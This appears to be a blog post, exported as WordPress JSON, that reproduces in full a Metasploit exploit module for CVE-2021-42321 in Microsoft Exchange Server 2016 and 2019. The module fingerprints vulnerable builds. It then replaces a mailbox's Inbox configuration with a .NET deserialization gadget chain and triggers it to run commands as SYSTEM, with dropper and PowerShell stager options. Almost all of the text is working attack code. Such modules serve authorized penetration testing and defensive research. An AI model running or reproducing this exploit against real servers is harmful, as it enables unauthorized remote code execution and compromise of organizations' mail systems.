##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n
require ‘nokogiri’<\/p>\n
class MetasploitModule < Msf::Exploit::Remote<\/p>\n
Rank = ExcellentRanking<\/p>\n
prepend Msf::Exploit::Remote::AutoCheck
\ninclude Msf::Exploit::Remote::HttpClient
\ninclude Msf::Exploit::CmdStager
\ninclude Msf::Exploit::Powershell<\/p>\n
def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n‘Name’ => ‘Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE’,
\n‘Description’ => %q{
\nThis vulnerability allows remote attackers to execute arbitrary code
\non Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11
\nprior to Security Update 2, Exchange Server 2016 CU21 prior to
\nSecurity Update 3, and Exchange Server 2016 CU22 prior to
\nSecurity Update 2.<\/p>\n
Note that authentication is required to exploit this vulnerability.<\/p>\n
The specific flaw exists due to the fact that the deny list for the
\nChainedSerializationBinder had a typo whereby an entry was typo’d as
\nSystem.Security.ClaimsPrincipal instead of the proper value of
\nSystem.Security.Claims.ClaimsPrincipal.<\/p>\n
By leveraging this vulnerability, attacks can bypass the
\nChainedSerializationBinder’s deserialization deny list
\nand execute code as NT AUTHORITY\\SYSTEM.<\/p>\n
Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019,
\nand Exchange Server 2016 CU22 SU0 on Windows Server 2016.
\n},
\n‘Author’ => [
\n‘pwnforsp’, # Original Bug Discovery
\n‘zcgonvh’, # Of 360 noah lab, Original Bug Discovery
\n‘Microsoft Threat Intelligence Center’, # Discovery of exploitation in the wild
\n‘Microsoft Security Response Center’, # Discovery of exploitation in the wild
\n‘peterjson’, # Writeup
\n‘testanull’, # PoC Exploit
\n‘Grant Willcox’, # Aka tekwizz123. That guy in the back who took the hard work of all the people above and wrote this module :D
\n],
\n‘References’ => [
\n[‘CVE’, ‘2021-42321’],
\n[‘URL’, ‘https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2021-42321’],
\n[‘URL’, ‘https:\/\/support.microsoft.com\/en-us\/topic\/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7’],
\n[‘URL’, ‘https:\/\/techcommunity.microsoft.com\/t5\/exchange-team-blog\/released-november-2021-exchange-server-security-updates\/ba-p\/2933169’],
\n[‘URL’, ‘https:\/\/gist.github.com\/testanull\/0188c1ae847f37a70fe536123d14f398’],
\n[‘URL’, ‘https:\/\/peterjson.medium.com\/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852’]\n],
\n‘DisclosureDate’ => ‘2021-12-09’,
\n‘License’ => MSF_LICENSE,
\n‘Platform’ => ‘win’,
\n‘Arch’ => [ARCH_CMD, ARCH_X86, ARCH_X64],
\n‘Privileged’ => true,
\n‘Targets’ => [
\n[
\n‘Windows Command’,
\n{
\n‘Arch’ => ARCH_CMD,
\n‘Type’ => :win_cmd
\n}
\n],
\n[
\n‘Windows Dropper’,
\n{
\n‘Arch’ => [ARCH_X86, ARCH_X64],
\n‘Type’ => :win_dropper,
\n‘DefaultOptions’ => {
\n‘CMDSTAGER::FLAVOR’ => :psh_invokewebrequest
\n}
\n}
\n],
\n[
\n‘PowerShell Stager’,
\n{
\n‘Arch’ => [ARCH_X86, ARCH_X64],
\n‘Type’ => :psh_stager
\n}
\n]\n],
\n‘DefaultTarget’ => 0,
\n‘DefaultOptions’ => {
\n‘SSL’ => true,
\n‘HttpClientTimeout’ => 5,
\n‘WfsDelay’ => 10
\n},
\n‘Notes’ => {
\n‘Stability’ => [CRASH_SAFE],
\n‘Reliability’ => [REPEATABLE_SESSION],
\n‘SideEffects’ => [
\nIOC_IN_LOGS, # Can easily log using advice at https:\/\/techcommunity.microsoft.com\/t5\/exchange-team-blog\/released-november-2021-exchange-server-security-updates\/ba-p\/2933169
\nCONFIG_CHANGES # Alters the user configuration on the Inbox folder to get the payload to trigger.
\n]\n}
\n)
\n)
\nregister_options([
\nOpt::RPORT(443),
\nOptString.new(‘TARGETURI’, [true, ‘Base path’, ‘\/’]),
\nOptString.new(‘HttpUsername’, [true, ‘The username to log into the Exchange server as’, ”]),
\nOptString.new(‘HttpPassword’, [true, ‘The password to use to authenticate to the Exchange server’, ”])
\n])
\nend<\/p>\n
def post_auth?
\ntrue
\nend<\/p>\n
def username
\ndatastore[‘HttpUsername’]\nend<\/p>\n
def password
\ndatastore[‘HttpPassword’]\nend<\/p>\n
def vuln_builds
\n# https:\/\/docs.microsoft.com\/en-us\/exchange\/new-features\/build-numbers-and-release-dates?view=exchserver-2019
\n[
\n[Rex::Version.new(‘15.1.2308.8’), Rex::Version.new(‘15.1.2308.20’)], # Exchange Server 2016 CU21
\n[Rex::Version.new(‘15.1.2375.7’), Rex::Version.new(‘15.1.2375.17’)], # Exchange Server 2016 CU22
\n[Rex::Version.new(‘15.2.922.7’), Rex::Version.new(‘15.2.922.19’)], # Exchange Server 2019 CU10
\n[Rex::Version.new(‘15.2.986.5’), Rex::Version.new(‘15.2.986.14’)] # Exchange Server 2019 CU11
\n]\nend<\/p>\n
def check
\n# First lets try a cheap way of doing this via a leak of the X-OWA-Version header.
\n# If we get this we know the version number for sure and we can skip a lot of leg work.
\nres = send_request_cgi(
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, ‘\/owa\/service’)
\n)<\/p>\n
unless res
\nreturn CheckCode::Unknown(‘Target did not respond to check.’)
\nend<\/p>\n
if res.headers[‘X-OWA-Version’]\nbuild = res.headers[‘X-OWA-Version’]\nif vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
\nreturn CheckCode::Appears(“Exchange Server #{build} is a vulnerable build.”)
\nelse
\nreturn CheckCode::Safe(“Exchange Server #{build} is not a vulnerable build.”)
\nend
\nend<\/p>\n
# Next, determine if we are up against an older version of Exchange Server where
\n# the \/owa\/auth\/logon.aspx page gives the full version. Recent versions of Exchange
\n# give only a partial version without the build number.
\nres = send_request_cgi(
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, ‘\/owa\/auth\/logon.aspx’)
\n)<\/p>\n
unless res
\nreturn CheckCode::Unknown(‘Target did not respond to check.’)
\nend<\/p>\n
if res.code == 200 && ((%r{\/owa\/(?<build>\\d+\\.\\d+\\.\\d+\\.\\d+)} =~ res.body) || (%r{\/owa\/auth\/(?<build>\\d+\\.\\d+\\.\\d+\\.\\d+)} =~ res.body))
\nif vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
\nreturn CheckCode::Appears(“Exchange Server #{build} is a vulnerable build.”)
\nelse
\nreturn CheckCode::Safe(“Exchange Server #{build} is not a vulnerable build.”)
\nend
\nend<\/p>\n
# Next try @tseller’s way and try \/ecp\/Current\/exporttool\/microsoft.exchange.ediscovery.exporttool.application
\n# URL which if successful should provide some XML with entries like the following:
\n#
\n# <assemblyIdentity name=”microsoft.exchange.ediscovery.exporttool.application”
\n# version=”15.2.986.5″ publicKeyToken=”b1d1a6c45aa418ce” language=”neutral”
\n# processorArchitecture=”msil” xmlns=”urn:schemas-microsoft-com:asm.v1″ \/>
\n#
\n# This only works on Exchange Server 2013 and later and may not always work, but if it
\n# does work it provides the full version number so its a nice strategy.
\nres = send_request_cgi(
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, ‘\/ecp\/current\/exporttool\/microsoft.exchange.ediscovery.exporttool.application’)
\n)<\/p>\n
unless res
\nreturn CheckCode::Unknown(‘Target did not respond to check.’)
\nend<\/p>\n
if res.code == 200 && res.body =~ \/name=”microsoft.exchange.ediscovery.exporttool” version=”\\d+\\.\\d+\\.\\d+\\.\\d+”\/
\nbuild = res.body.match(\/name=”microsoft.exchange.ediscovery.exporttool” version=”(\\d+\\.\\d+\\.\\d+\\.\\d+)”\/)[1]\nif vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
\nreturn CheckCode::Appears(“Exchange Server #{build} is a vulnerable build.”)
\nelse
\nreturn CheckCode::Safe(“Exchange Server #{build} is not a vulnerable build.”)
\nend
\nend<\/p>\n
# Finally, try a variation on the above and use a well known trick of grabbing \/owa\/auth\/logon.aspx
\n# to get a partial version number, then use the URL at \/ecp\/<version here>\/exporttool\/. If we get a 200
\n# OK response, we found the target version number, otherwise we didn’t find it.
\n#
\n# Props go to @jmartin-r7 for improving my original code for this and suggestion the use of
\n# canonical_segments to make this close to the Rex::Version code format. Also for noticing that
\n# version_range is a Rex::Version object already and cleaning up some of my original code to simplify
\n# things on this premise.<\/p>\n
vuln_builds.each do |version_range|
\nreturn CheckCode::Unknown(‘Range provided is not iterable’) unless version_range[0].canonical_segments[0..-2] == version_range[1].canonical_segments[0..-2]\n
prepend_range = version_range[0].canonical_segments[0..-2]\nlowest_patch = version_range[0].canonical_segments.last
\nwhile Rex::Version.new((prepend_range.dup << lowest_patch).join(‘.’)) <= version_range[1]\nres = send_request_cgi(
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, “\/ecp\/#{build}\/exporttool\/”)
\n)
\nunless res
\nreturn CheckCode::Unknown(‘Target did not respond to check.’)
\nend
\nif res && res.code == 200
\nreturn CheckCode::Appears(“Exchange Server #{build} is a vulnerable build.”)
\nend<\/p>\n
lowest_patch += 1
\nend<\/p>\n
CheckCode::Unknown(‘Could not determine the build number of the target Exchange Server.’)
\nend
\nend<\/p>\n
def exploit
\ncase target[‘Type’]\nwhen :win_cmd
\nexecute_command(payload.encoded)
\nwhen :win_dropper
\nexecute_cmdstager
\nwhen :psh_stager
\nexecute_command(cmd_psh_payload(
\npayload.encoded,
\npayload.arch.first,
\nremove_comspec: true
\n))
\nend
\nend<\/p>\n
def execute_command(cmd, _opts = {})
\n# Get the user’s inbox folder’s ID and change key ID.
\nprint_status(“Getting the user’s inbox folder’s ID and ChangeKey ID…”)
\nxml_getfolder_inbox = %(<?xml version=”1.0″ encoding=”utf-8″?>
\n<soap:Envelope xmlns:xsi=”http:\/\/www.w3.org\/2001\/XMLSchema-instance” xmlns:m=”http:\/\/schemas.microsoft.com\/exchange\/services\/2006\/messages” xmlns:t=”http:\/\/schemas.microsoft.com\/exchange\/services\/2006\/types” xmlns:soap=”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/”>
\n<soap:Header>
\n<t:RequestServerVersion Version=”Exchange2013″ \/>
\n<\/soap:Header>
\n<soap:Body>
\n<m:GetFolder>
\n<m:FolderShape>
\n<t:BaseShape>AllProperties<\/t:BaseShape>
\n<\/m:FolderShape>
\n<m:FolderIds>
\n<t:DistinguishedFolderId Id=”inbox” \/>
\n<\/m:FolderIds>
\n<\/m:GetFolder>
\n<\/soap:Body>
\n<\/soap:Envelope>)<\/p>\n
res = send_request_cgi(
\n{
\n‘method’ => ‘POST’,
\n‘uri’ => normalize_uri(datastore[‘TARGETURI’], ‘ews’, ‘exchange.asmx’),
\n‘data’ => xml_getfolder_inbox,
\n‘ctype’ => ‘text\/xml; charset=utf-8’ # If you don’t set this header, then we will end up sending a URL form request which Exchange will correctly complain about.
\n}
\n)
\nfail_with(Failure::Unreachable, ‘Connection failed’) if res.nil?<\/p>\n
unless res&.body
\nfail_with(Failure::UnexpectedReply, ‘Response obtained but it was empty!’)
\nend<\/p>\n
xml_getfolder = res.get_xml_document
\nxml_getfolder.remove_namespaces!
\nxml_tag = xml_getfolder.xpath(‘\/\/FolderId’)
\nif xml_tag.empty?
\nfail_with(Failure::UnexpectedReply, ‘Response obtained but no FolderId element was found within it!’)
\nend
\nunless xml_tag.attribute(‘Id’) && xml_tag.attribute(‘ChangeKey’)
\nfail_with(Failure::UnexpectedReply, ‘Response obtained without expected Id and ChangeKey elements!’)
\nend
\nchange_key_val = xml_tag.attribute(‘ChangeKey’).value
\nfolder_id_val = xml_tag.attribute(‘Id’).value
\nprint_good(“ChangeKey value for Inbox folder is #{change_key_val}”)
\nprint_good(“ID value for Inbox folder is #{folder_id_val}”)<\/p>\n
# Delete the user configuration object that currently on the Inbox folder.
\nprint_status(‘Deleting the user configuration object associated with Inbox folder…’)
\nxml_delete_inbox_user_config = %(<?xml version=”1.0″ encoding=”utf-8″?>
\n<soap:Envelope xmlns:xsi=”http:\/\/www.w3.org\/2001\/XMLSchema-instance” xmlns:m=”http:\/\/schemas.microsoft.com\/exchange\/services\/2006\/messages” xmlns:t=”http:\/\/schemas.microsoft.com\/exchange\/services\/2006\/types” xmlns:soap=”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/”>
\n<soap:Header>
\n<t:RequestServerVersion Version=”Exchange2013″ \/>
\n<\/soap:Header>
\n<soap:Body>
\n<m:DeleteUserConfiguration>
\n<m:UserConfigurationName Name=”ExtensionMasterTable”>
\n<t:FolderId Id=”#{folder_id_val}” ChangeKey=”#{change_key_val}” \/>
\n<\/m:UserConfigurationName>
\n<\/m:DeleteUserConfiguration>
\n<\/soap:Body>
\n<\/soap:Envelope>)<\/p>\n
res = send_request_cgi(
\n{
\n‘method’ => ‘POST’,
\n‘uri’ => normalize_uri(datastore[‘TARGETURI’], ‘ews’, ‘exchange.asmx’),
\n‘data’ => xml_delete_inbox_user_config,
\n‘ctype’ => ‘text\/xml; charset=utf-8’ # If you don’t set this header, then we will end up sending a URL form request which Exchange will correctly complain about.
\n}
\n)
\nfail_with(Failure::Unreachable, ‘Connection failed’) if res.nil?<\/p>\n
unless res&.body
\nfail_with(Failure::UnexpectedReply, ‘Response obtained but it was empty!’)
\nend<\/p>\n
if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass=”Success”><m:ResponseCode>NoError<\/m:ResponseCode><\/m:DeleteUserConfigurationResponseMessage>}
\nprint_good(‘Successfully deleted the user configuration object associated with the Inbox folder!’)
\nelse
\nprint_warning(‘Was not able to successfully delete the existing user configuration on the Inbox folder!’)
\nprint_warning(‘Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!’)
\nend<\/p>\n
# Now to replace the deleted user configuration object with our own user configuration object.
\nprint_status(‘Creating the malicious user configuration object on the Inbox folder!’)<\/p>\n
gadget_chain = Rex::Text.encode_base64(Msf::Util::DotNetDeserialization.generate(cmd, gadget_chain: :ClaimsPrincipal, formatter: :BinaryFormatter))
\nxml_malicious_user_config = %(<?xml version=”1.0″ encoding=”utf-8″?>
\n<soap:Envelope xmlns:xsi=”http:\/\/www.w3.org\/2001\/XMLSchema-instance” xmlns:m=”http:\/\/schemas.microsoft.com\/exchange\/services\/2006\/messages” xmlns:t=”http:\/\/schemas.microsoft.com\/exchange\/services\/2006\/types” xmlns:soap=”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/”>
\n<soap:Header>
\n<t:RequestServerVersion Version=”Exchange2013″ \/>
\n<\/soap:Header>
\n<soap:Body>
\n<m:CreateUserConfiguration>
\n<m:UserConfiguration>
\n<t:UserConfigurationName Name=”ExtensionMasterTable”>
\n<t:FolderId Id=”#{folder_id_val}” ChangeKey=”#{change_key_val}” \/>
\n<\/t:UserConfigurationName>
\n<t:Dictionary>
\n<t:DictionaryEntry>
\n<t:DictionaryKey>
\n<t:Type>String<\/t:Type>
\n<t:Value>OrgChkTm<\/t:Value>
\n<\/t:DictionaryKey>
\n<t:DictionaryValue>
\n<t:Type>Integer64<\/t:Type>
\n<t:Value>#{rand(1000000000000000000..9111999999999999999)}<\/t:Value>
\n<\/t:DictionaryValue>
\n<\/t:DictionaryEntry>
\n<t:DictionaryEntry>
\n<t:DictionaryKey>
\n<t:Type>String<\/t:Type>
\n<t:Value>OrgDO<\/t:Value>
\n<\/t:DictionaryKey>
\n<t:DictionaryValue>
\n<t:Type>Boolean<\/t:Type>
\n<t:Value>false<\/t:Value>
\n<\/t:DictionaryValue>
\n<\/t:DictionaryEntry>
\n<\/t:Dictionary>
\n<t:BinaryData>#{gadget_chain}<\/t:BinaryData>
\n<\/m:UserConfiguration>
\n<\/m:CreateUserConfiguration>
\n<\/soap:Body>
\n<\/soap:Envelope>)<\/p>\n
res = send_request_cgi(
\n{
\n‘method’ => ‘POST’,
\n‘uri’ => normalize_uri(datastore[‘TARGETURI’], ‘ews’, ‘exchange.asmx’),
\n‘data’ => xml_malicious_user_config,
\n‘ctype’ => ‘text\/xml; charset=utf-8’ # If you don’t set this header, then we will end up sending a URL form request which Exchange will correctly complain about.
\n}
\n)
\nfail_with(Failure::Unreachable, ‘Connection failed’) if res.nil?<\/p>\n
unless res&.body
\nfail_with(Failure::UnexpectedReply, ‘Response obtained but it was empty!’)
\nend<\/p>\n
unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass=”Success”><m:ResponseCode>NoError<\/m:ResponseCode><\/m:CreateUserConfigurationResponseMessage>}
\nfail_with(Failure::UnexpectedReply, ‘Was not able to successfully create the malicious user configuration on the Inbox folder!’)
\nend<\/p>\n
print_good(‘Successfully created the malicious user configuration object and associated with the Inbox folder!’)<\/p>\n
# Deserialize our object. If all goes well, you should now have SYSTEM :)
\nprint_status(‘Attempting to deserialize the user configuration object using a GetClientAccessToken request…’)
\nxml_get_client_access_token = %(<?xml version=”1.0″ encoding=”utf-8″?>
\n<soap:Envelope xmlns:xsi=”http:\/\/www.w3.org\/2001\/XMLSchema-instance” xmlns:m=”http:\/\/schemas.microsoft.com\/exchange\/services\/2006\/messages” xmlns:t=”http:\/\/schemas.microsoft.com\/exchange\/services\/2006\/types” xmlns:soap=”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/”>
\n<soap:Header>
\n<t:RequestServerVersion Version=”Exchange2013″ \/>
\n<\/soap:Header>
\n<soap:Body>
\n<m:GetClientAccessToken>
\n<m:TokenRequests>
\n<t:TokenRequest>
\n<t:Id>#{Rex::Text.rand_text_alphanumeric(4..50)}<\/t:Id>
\n<t:TokenType>CallerIdentity<\/t:TokenType>
\n<\/t:TokenRequest>
\n<\/m:TokenRequests>
\n<\/m:GetClientAccessToken>
\n<\/soap:Body>
\n<\/soap:Envelope>)<\/p>\n
res = send_request_cgi(
\n{
\n‘method’ => ‘POST’,
\n‘uri’ => normalize_uri(datastore[‘TARGETURI’], ‘ews’, ‘exchange.asmx’),
\n‘data’ => xml_get_client_access_token,
\n‘ctype’ => ‘text\/xml; charset=utf-8’ # If you don’t set this header, then we will end up sending a URL form request which Exchange will correctly complain about.
\n}
\n)
\nfail_with(Failure::Unreachable, ‘Connection failed’) if res.nil?<\/p>\n
unless res&.body
\nfail_with(Failure::UnexpectedReply, ‘Response obtained but it was empty!’)
\nend<\/p>\n
unless res.body =~ %r{<e:Message xmlns:e=”http:\/\/schemas.microsoft.com\/exchange\/services\/2006\/errors”>An internal server error occurred. The operation failed.<\/e:Message>}
\nfail_with(Failure::UnexpectedReply, ‘Did not recieve the expected internal server error upon deserialization!’)
\nend
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"
## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## require ‘nokogiri’ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Powershell def initialize(info = {}) super( update_info( info, ‘Name’ => ‘Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE’, ‘Description’ => %q{ This vulnerability allows remote attackers to …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21057","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21057","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21057"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21057\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21057"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21057"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}